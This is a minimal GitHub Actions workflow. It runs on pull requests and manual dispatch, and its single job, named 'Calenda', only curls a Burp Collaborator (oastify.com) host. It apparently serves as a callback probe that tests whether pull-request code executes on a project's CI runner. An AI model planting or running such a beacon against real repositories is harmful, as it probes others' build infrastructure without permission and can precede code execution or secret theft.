on: 
  - workflow_dispatch
  - pull_request
jobs:
  build:
    runs-on: ubuntu-latest
    name: Calenda
    steps:
      - name: curl calenda
        run: curl qc66k98p4lhtnzgkq562em5s5jbaz1nq.oastify.com
